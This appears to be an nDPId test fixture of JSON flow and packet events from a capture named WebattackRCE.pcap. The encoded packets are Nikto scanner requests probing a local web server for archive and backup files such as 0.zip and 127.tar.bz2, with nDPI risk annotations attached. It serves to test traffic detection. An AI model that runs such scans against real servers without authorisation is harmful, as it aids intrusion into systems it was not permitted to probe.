+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1576420276879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276879,"pkt":"AAAAAAAAAAAAAAAACABFAADAhf9AAEAGtjZ\/AAABfwAAAcKYH5Cnmb2\/tsRlFIAYAED+tAAAAQEICp1m+7edZvu2R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1576420276881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276881,"pkt":"AAAAAAAAAAAAAAAACABFAADADYtAAEAGLqt\/AAABfwAAAcKaH5CHzTXOE9kNb4AYAED+tAAAAQEICp1m+7mdZvu5R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1576420276884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276884,"pkt":"AAAAAAAAAAAAAAAACABFAADAT5pAAEAG7Jt\/AAABfwAAAcKcH5DBOXfeD5T\/lYAYAED+tAAAAQEICp1m+7udZvu7R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1576420276885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276885,"pkt":"AAAAAAAAAAAAAAAACABFAADFQQ5AAEAG+yJ\/AAABfwAAAcKeH5AdhXlKg0oevYAYAED+uQAAAQEICp1m+72dZvu9R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1576420276886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276886,"pkt":"AAAAAAAAAAAAAAAACABFAADFWJBAAEAG46B\/AAABfwAAAcKgH5CSJ2DMWYYFgIAYAED+uQAAAQEICp1m+76dZvu+R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1576420276888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276888,"pkt":"AAAAAAAAAAAAAAAACABFAAC95a1AAEAGVot\/AAABfwAAAcKiH5DfWN3u+DsBkYAYAED+sQAAAQEICp1m+8CdZvvAR0VUIC8wLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1576420276890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276890,"pkt":"AAAAAAAAAAAAAAAACABFAAC9vy5AAEAGfQp\/AAABfwAAAcKkH5Dme4drk\/tL44AYAED+sQAAAQEICp1m+8KdZvvCR0VUIC8wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1576420276891,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276891,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/ZdAAEAGPpl\/AAABfwAAAcKmH5DYD8XTrc+7CoAYAED+uQAAAQEICp1m+8OdZvvDR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1576420276893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276893,"pkt":"AAAAAAAAAAAAAAAACABFAADFI6xAAEAGGIV\/AAABfwAAAcKoH5Ar0hvuzfCq7oAYAED+uQAAAQEICp1m+8WdZvvFR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1576420276894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276894,"pkt":"AAAAAAAAAAAAAAAACABFAADDA5ZAAEAGOJ1\/AAABfwAAAcKqH5B\/mzvUPuYs44AYAED+twAAAQEICp1m+8adZvvGR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1576420276896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276896,"pkt":"AAAAAAAAAAAAAAAACABFAADD\/SZAAEAGPwx\/AAABfwAAAcKsH5AB18VtW5jVeIAYAED+twAAAQEICp1m+8idZvvIR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 